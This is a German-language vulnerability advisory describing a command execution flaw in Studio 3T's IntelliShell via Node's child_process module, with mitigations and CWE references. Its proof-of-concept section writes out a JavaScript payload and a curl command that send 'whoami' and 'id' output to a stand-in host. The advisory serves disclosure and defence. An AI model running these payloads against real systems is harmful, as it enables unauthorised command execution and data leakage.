
Studio 3T v.2025.1.0
Software: Studio 3T v.2025.1.0
Sicherheitsbericht: Studio 3T Remote Command Execution
Überblick Eine kritische Sicherheitslücke in Studio 3T Version 2025.1.0 und früher ermöglicht es einem entfernten Angreifer, beliebigen Code über eine manipulierte Nutzlast auszuführen, die das child_process-Modul in der IntelliShell-Komponente ausnutzt.
Details Schwachstellentyp: Remote Command Execution Betroffenes Produkt: Studio 3T, Version <= 2025.1.0 Betroffene Komponente: IntelliShell Angriffstyp: Remote Auswirkungen: Codeausführung: Ja Denial of Service: Ja Privilegieneskalation: Ja
Beschreibung Die Sicherheitslücke ermöglicht es einem entfernten Angreifer, beliebige Betriebssystembefehle auszuführen, indem er eine bösartige JavaScript-Nutzlast über IntelliShell sendet und dabei das child_process-Modul verwendet. Es handelt sich um eine blinde Ausführungssicherheitslücke, d.h. es wird keine direkte Ausgabe an den Angreifer zurückgegeben.
Angriffsvektor Stellen Sie eine Verbindung zu einer MongoDB-Instanz her. Senden Sie eine bösartige JavaScript-Nutzlast über IntelliShell, die das child_process-Modul verwendet, um beliebige Betriebssystembefehle auszuführen.
Proof of Concept Um die Sicherheitslücke zu überprüfen, führen Sie die folgenden Schritte aus:
Richten Sie einen lokalen HTTP-Server ein:python3 -m http.server 80
Führen Sie die folgende JavaScript-Nutzlast in IntelliShell aus: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
Alternativ verwenden Sie den folgenden Befehl als Verifizierungsvektor:curl http://site/$(id)
Referenzen
Studio 3T Offizielle Website
Studio 3T GitHub Repository
CWE-78: OS Command Injection
CWE-94: Code Injection
Gegenmaßnahmen Benutzer: Aktualisieren Sie auf eine gepatchte Version von Studio 3T (falls verfügbar) oder vermeiden Sie die Verwendung von IntelliShell mit nicht vertrauenswürdigen MongoDB-Verbindungen. Anbieter: Beschränken oder bereinigen Sie Eingaben für das child_process-Modul in IntelliShell, um unbefugte Befehlsausführung zu verhindern.
Danksagungen Diese Sicherheitslücke wurde von Kaio Mendonca Pereira entdeckt und gemeldet.